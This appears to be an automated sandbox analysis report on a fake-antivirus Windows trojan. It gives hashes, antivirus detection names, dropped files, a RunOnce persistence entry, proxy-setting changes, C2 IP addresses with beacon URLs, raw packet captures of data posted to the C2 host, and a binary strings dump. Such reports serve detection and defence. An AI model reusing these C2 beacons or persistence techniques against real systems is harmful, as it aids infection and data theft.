Analysis Date: 2015-08-29 07:59:31
MD5: c4c24b35a4d3b5c5fa332d27f46fe2cf
SHA1: 33a72b4d2dad75b4736a68649aa90c5209f66502

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: f34375c21cc97d9e4946fa0c9ba32220 sha1: 8551c40fcd5c8aa67efa22ff408c448efe4ea72c size: 182272
Section .rdata — md5: 02e582a7214ac986b632e633a75288cc sha1: 246ed5fdb450a36f1e0934a9a2bd582509f59237 size: 2048
Section .data — md5: 25b1a8a6a6c8ef7abb64d9c3c0dbbebe sha1: ed1bb37025e0a667dbf3f3fc8fb740281c4086ce size: 122368
Section .rsrc — md5: 87a429fc6853f9b30aa9ed892d49bb0f sha1: 9807a0fc91ce5a80459f30e02981ac93776eb698 size: 5120
Timestamp: 1971-02-21 17:04:37 (PE header compile timestamp; a 1971 date predates the PE format itself, so it is almost certainly forged or corrupted and must not be used to date the build)
PEhash: d1757550dea3e60f14627f63cf10b19147c89880
IMPhash: 8aaaf4897d2db89e81da04378e9e697c
AV Rising: Trojan.FakeAV!49B1
AV Mcafee: Generic FakeAlert.amb
AV Avira (antivir): TR/FakeAV.btxt.7
AV Twister: Trojan.558BEC81C4DCFAFFF.mg
AV Ad-Aware: Gen:Heur.Cridex.2
AV Alwil (avast): MalOb-FY [Cryp]
AV Eset (nod32): Win32/Kryptik.LYW
AV Grisoft (avg): FakeAlert.AAS
AV Symantec: Trojan.FakeAV!gen39
AV Fortinet: W32/FakeAlert.AMB!tr
AV BitDefender: Gen:Heur.Cridex.2
AV K7: Trojan ( 001e60c61 )
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV MalwareBytes: Trojan.Agent
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV Ikarus: Trojan.Win32.FakeAV
AV Emsisoft: Gen:Heur.Cridex.2
AV Zillya!: Trojan.FakeAV.Win32.56392
AV Kaspersky: Trojan.Win32.FakeAV.btxt
AV Trend Micro: TROJ_FAKEAV.SMID
AV CAT (quickheal): FraudTool.Security
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo
AV Padvish: Malware.Trojan.FakeAV-5428
AV BullGuard: Gen:Heur.Cridex.2
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV ClamAV: Trojan.FakeAV-5428
AV Dr. Web: Trojan.Inject.28897
AV F-Secure: Gen:Heur.Cridex.2
AV CA (E-Trust Ino): Win32/Diple.A!generic

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\33a72b4d2dad75b4736a68649aa90c5209f66502
Creates File: C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a299B.tmp
Deletes File: C:\33a72b4d2dad75b4736a68649aa90c5209f66502
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aE615.tmp" (note: the .tmp name created above is a299B.tmp, while the one executed is aE615.tmp — the report does not show where aE615.tmp came from)
Creates Process: "C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe" "C:\malware.exe" (the dropped copy is launched with the original sample path as its argument)
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hEgAhMmPoDl08200 ➝ C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200.exe\\x00 (value ends in a trailing NUL byte; RunOnce is an autostart location, so this entry is a persistence indicator)
Creates File: C:\Documents and Settings\All Users\Application Data\hEgAhMmPoDl08200\hEgAhMmPoDl08200
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE615.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=08200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.77/i.php?affid=08200
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GET: http://69.50.195.77/r.php?affid=08200&data=31AEA843B2D209EF2E25E669DAB068370365623929ACCB494C7074C927B430BD010410&v=1&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Note: in the raw captures below, the first two requests carry a malformed Accept header (`Accept: *//*`) whereas the third uses the standard `Accept: */*`; together with the fixed `affid=08200` parameter and the hard-coded Referer equal to the target host, this is a usable network fingerprint for this sample.
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.77:80
Flows TCP: 192.168.1.1:1034 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30383230 30204854 54502f31   fid=08200 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3038 32303020 48545450 2f312e31   d=08200 HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f3639 2e35302e 3139352e 37370d0a   //69.50.195.77..
0x00000040 (00064)   41636365 70743a20 2a2f2f2a 0d0a436f   Accept: *//*..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x00000080 (00128)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000090 (00144)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000a0 (00160)   6c653b20 4d534945 20372e30 3b205769   le; MSIE 7.0; Wi
0x000000b0 (00176)   6e646f77 73204e54 20352e31 3b204754   ndows NT 5.1; GT
0x000000c0 (00192)   42302e30 3b202e4e 45542043 4c522031   B0.0; .NET CLR 1
0x000000d0 (00208)   2e312e34 33323229 0d0a486f 73743a20   .1.4322)..Host: 
0x000000e0 (00224)   36392e35 302e3139 352e3737 0d0a436f   69.50.195.77..Co
0x000000f0 (00240)   6e74656e 742d4c65 6e677468 3a203738   ntent-Length: 78
0x00000100 (00256)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000110 (00272)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d3331 41454138   e....data=31AEA8
0x00000140 (00320)   34334232 44323039 45463245 32354536   43B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373033 36353632   69DAB06837036562
0x00000160 (00352)   33393239 41434342 34393443 37303734   3929ACCB494C7074
0x00000170 (00368)   43393237 42343330 42443031 30343126   C927B430BD01041&
0x00000180 (00384)   763d31                                v=1

0x00000000 (00000)   47455420 2f722e70 68703f61 66666964   GET /r.php?affid
0x00000010 (00016)   3d303832 30302664 6174613d 33314145   =08200&data=31AE
0x00000020 (00032)   41383433 42324432 30394546 32453235   A843B2D209EF2E25
0x00000030 (00048)   45363639 44414230 36383337 30333635   E669DAB068370365
0x00000040 (00064)   36323339 32394143 43423439 34433730   623929ACCB494C70
0x00000050 (00080)   37344339 32374234 33304244 30313034   74C927B430BD0104
0x00000060 (00096)   31302676 3d312668 3d312048 5454502f   10&v=1&h=1 HTTP/
0x00000070 (00112)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000080 (00128)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000090 (00144)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x000000a0 (00160)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x000000b0 (00176)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000c0 (00192)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000d0 (00208)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000e0 (00224)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000f0 (00240)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000100 (00256)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000110 (00272)   290d0a48 6f73743a 2036392e 35302e31   )..Host: 69.50.1
0x00000120 (00288)   39352e37 370d0a43 6f6e6e65 6374696f   95.77..Connectio
0x00000130 (00304)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x00000140 (00320)   0a334232 44323039 45463245 32354536   .3B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373033 36353632   69DAB06837036562
0x00000160 (00352)   33393239 41434342 34393443 37303734   3929ACCB494C7074
0x00000170 (00368)   43393237 42343330 42443031 30343126   C927B430BD01041&
0x00000180 (00384)   763d31                                v=1


Strings
..(o
.
....
m
r
]
.u.
].
5
^...
|
.h
.
.
@
.
^
 
n
.

1001
File
Main
MS Sans Serif
01l'u(5
0[8	f	
.098rcw
%0HrU!
0Iab<f
0jbyNn
0j] mj
0m}Ovu
*<^/>0n
[^@0,y
13?yrt_
"15bp4 <B
1h643d
<1_@ha
$1HK,e
,|1J5~
1lIy_y9
1!N6K8
1XNrX 	
)1@ynrKB3~
(1}ySPT
21raO^
>29P46
2bKoZ(
&2;`ds
2end9d
([2h]&
2tHx.'
}|30Q}
%!37Z_
3Epw]Io|
3Eqfgt
:3f+Gj(I3
3J".SX;b]*=
_3=.@Sn
{3zMAGS-
/4@4CuCJ"
47nv*Q
4Awe\v
4iE)PCvNu
4k\jB!
--4/qQv
|	4rTuF\0P
<4[zne
(5}8_D
/#5f=/
5%F5Dh
5iDxiP
@5O#ot
5pvm CCB
+6lZB*
;6nd2Yq
{6Q>'\
6qFV'p
]6x+]^YM;*V`~
_73UWbZ
7.>5&.
	75}p@
79<mUt
7CLyBr~
7;eyg)
7H5]=S
}7j&G\
7TZ?DX
7yKX/$
?7ytMKd
_	[[>=8
8\+5ZR[
8>)7'<
&<8769<
87K@x\
8~88+)K
8<9~q	e
8fKzBrF4
=_~>8;k
>8&RO`
;8{wJj
8Wvk	8
8X$FUo
8ZgOm](
9]j{t*
9M[nmw
9RrX	w[
9:S)/+
=9|z" 
a3Axt"
A8WKu~H 
A^'c@S
>aC`*Z
Adof#s]
AF8s"d
*AgIw5
AGoy*j
Aj@28r
Ak@=:Y
aln_!}f
AlZZJj
A!m 	a|,2
\$<aMl
,)@ an
ANOWLJ
a}P[~W
As$b,t
Awr*'#
a WYk	w
Aytv#B77[
;bfa"<
Bf'&D6.h
:B+:G^{
B{gQtb
bhk/=py
BitBlt
<)=b>jK
b	+JYGE7
bo*7xF
]]*bP$
b;:Rvz
bt40=.A
b[vTiX
b=y=SG>
:c6qYg
|c6wv_
C8G>kO
#C\b`P
cckwSt
cD6J9PITH
CG5'c>
CharLowerA
ci||4370
CloseHandle
C\Ng3~	
.C}nu)
`cp[X9
}C.QEXgVY
CQJj,u
c;Qj@/W
CreateThread
#="|C&s
\CteM~
c@V/.qv
[CWCIX|
%cYQiS
|d0PWpH9
D8uYs{
{^D8Ws
dag4U{
@.data
d.DNf7t
DeleteCriticalSection
df0Cf7
dFWRuor
D~Kf/w
DK-t	cP)oJ
+`D'l`L
d+m>]'g
dNqm\T
_d?P\8a
dp9RzNPW
dp	K1e
?dq;SL
}d*R/U
-;Duy8
dyKkX?T
dzF69A_n
dzZouBw
\e^\^:
'E~0F_q
e.{1;G
E~2="7
~E44]/6
-e53-~^
E6{KSg
EaU#]^
eB!|ef#
]ED.[:
EevjQf
EF<0P/
EjF#Yk
<e=JqwT
enO'dTv
EnumSystemLocalesA
eRGy#?x(0
ExGJYM,N
ExitProcess
ExitThread
[eZ9/%
$[F7>"2"
faq4@4
fc)E^B
F|,DTq
ff>[ReFr
ffRO<go2
\Fg.mkdHp
fhD^lN
fIog;T
fJk~fBe
F!jLo:
?<fJyk
fka]@2
FlushFileBuffers
FlushInstructionCache
fn2~eP
>. fnh
|fNoni
fnU_Sd;J
FreeEnvironmentStringsA
FYw_& 
fZ]]e2^
@g(7<m03
g7R;dz
_<gD	)
gDAB,X
GDI32.dll
GetBkColor
GetBkMode
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetFileType
GetKeyState
GetLastError
GetOEMCP
GetPixel
GetProcessHeap
GetProcessShutdownParameters
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetTimeZoneInformation
GetWindowLongW
gJglAsA^[=e
~gJ(yn
g*K!8q
'GKCA8z
gl?Qjh)D
Gmyj*4
</gNXs
gQncNt
gr^96Y
g.\sf#
[h3tF.
h5kU/i
H-A.{(
&Hab+R
haw[7$
]hDGi-20
HeapAlloc
HeapCreate
HeapFree
hjSyd\8
=HK^G~5
_<h}M-
*HM6W#
hn:ni%}
H"Si]$
HsZ/l9
Ht-:uf
^^%HW9I
HXk|-k
hY"a^x
hZLueDC
\	*~I]
 i0j42
@]I9`E
.+(>i%9Ep
~{ Ib|Y
=iD?|j
I[FNAr
'i.FOdVg
:,IG]Y
>iK?AQ
]ikl^^
iKu'q1
InterlockedDecrement
InterlockedExchange
-irF|W
IsValidLocale
IWP_(>
?I|X@(
!iX%P%
{<IXtR
`I;znB	
{ j~<3
 J!$3P
j4|5df
J>aY:P
j,enEd
JghN-ig
>Jl5,(cF
jlfY(uV
jm'D"&`6
~JNl?qT
+j{O;1
Jtx,bC
J+#UP*
ju'r1@"P
jx7#Gn
JZ;'OE
k;0a]i#
k0} Zdc
k]!_1x
\K1.(x
k6Rx;t
K^8p[I^G
K96r2y
|K_"CaL
KERNEL32.dll
.kfn,6
K$~&$HV	
@KM {B
=^KObLYJ
KvYnWN
kW#aY2d0
&k^YK"48
KZ;)  s
l69E?0
LCMapStringA
lc]r7)
LeaveCriticalSection
LF)HI/2
LK.90T
#LKx~F 
Ll__es=wR$
|L'n9f
LnEstJ
l^nL'a
LocalAlloc
m0tA4QV
m''2lM8gk
m5oq*}
$(m5(*:SI
m(d8y#
Md,hGl%
[>M||{h
mhV"%<)
,MKBKy
'MKie}
~ml|8t
MSIMG32.dll
m#TtlTC<5
MW?xhvV]
mz^^ZJ
?N~^:@<
n+3E}sXtr
@n9jSNR
nciJ]<
n)|dFQ;f
ng&9pdj
^`NjFqhme#
nQBnv#*>
=N}SlU3
nv.3'08F
n	wp'F%L
NYKx/VRh
OC"	21O{
oFM# [
`oFUO_F
&!oiNK
oL?K 3
+olw'm
OMfWS#
)omTW~
o~nAe$
o? $&O
Oo$qYbJk
OPJ:F"E]+
o@PjN@2
OQ_r`~%
oTAu	j~(
ot=Fxh6
~O@:u~Gz]9
'_>P1r+
p8dbxOt"
(P}\f_[
_PH+u.
pl5n} 
>%:,Pm
#{pmYYh
PnLA5'Q
	pt-Xl
P])vc't|o|
PVPv7^+)=
#pwvdu
P^X!}+&
pXM]MV
q.:(0%
]q>0#A
?Q9z\q&
QaTxsw
qbKsj5a
,qEZ;8
/Q|ipI
QL%e?}
qLP<9%
@qO'\q`-t|
'Qt.XZ
qVO_=#
Q;W- ^
}q"wJHe
qWS'yV0
Qz`!8~;
-r5	}LF
?r7Pj 
+R87QO	<
$r>BE}
R]BR4;
`.rdata
&RdEBXe`
ReH5gk 
{Rh}8U
R<=$hv
Rich$-
rjxSQ5
`R 'K2I
rNm-lb*
rQ^7NZ
RtlUnwind
RvxUf)J
{\R\W*
r@W[0^
	S&2nL
sa<}XY
SelectObject
SetAbortProc
SetEndOfFile
SetEnvironmentVariableA
SetHandleCount
SetLastError
SetProcessShutdownParameters
SetStdHandle
SetTextCharacterExtra
/Sh5wt
sI2g3q
sKd@jo4
_sN27pI
snzJw^
sR?s	N
S/TN8oL
Su@'+0
Su~CV*
s*"W_QwK
#Swx/PD
&<")t/
T[2l]_
)t!\6C
Tarypx
:tB|L\~
TBSU6S
	T=FTf!
TG:*3G
!This program cannot be run in DOS mode.
&TH	T9
tJ6QHZ2
t]JMGah
Tq11:S5
|t-qJ{p
TransparentBlt
@tso-./
=TT+Br
tu(^s@
Tw"O/3
u2<rZX
u>#3O]w	(
Ua/I {
,UaNx^
UaZ*YV)
UB12apmV]
u}dlT~
).UEJr
u-]{?h
UH<B`o)
)U[,ir
`%U%N{bj
UQ u_(
USER32.dll
Us	o3pC
uXWBktXZw`
UyHW`\
v`@2Dr
V9@C|:5
Va6\d0
v?CTX"
:vcw]r~
Vd0')nu
VDoj~b
ven`ge
vgrZ/LL
vg}*Wc_UQ
VHk	`t4
VirtualAlloc
VirtualFree
VirtualQueryEx
vKEaWLG
&VlI7T
v>"npJ"
v.[!p2k
VRmR+(k
#vrT<#
'vytM'
waE^7j
)wBHyA
w*C@~.
wD#_'B
]W~dy-
+WE>\1FE
w.Fw2h
.&wg/E
WJx]&u
w-Lx^c
Wq.jlL
W$RCZ8
WriteConsoleA
WYn[D5
x8P;A"
x}9-lj
xA5/X'
X:Br,z
xc#Vc!
xD#J-yf
x$engXfY?
XH5kw}j
XHRHga
X('IP$
XM^j|(
X^Mw1g
?XZWiS
y08w<ndE
~Y=@1I	
*Y5(J/gk
y^AEPAK
YBe-D]O
+yGPv]H
yh~	$d
! ynyk]
(&YP|'f
Yq^7b9
yUN0jD
y@vUEJ
y"XahS
\Y|ZW+
z35K/0n
#|}=z5
z6?\.:
ZaOy'[i
ZBB9'0T_|0>
/zDrak
Z,ff.wxf
_Z)I1)
z&u|1=$
Zz\LpB2: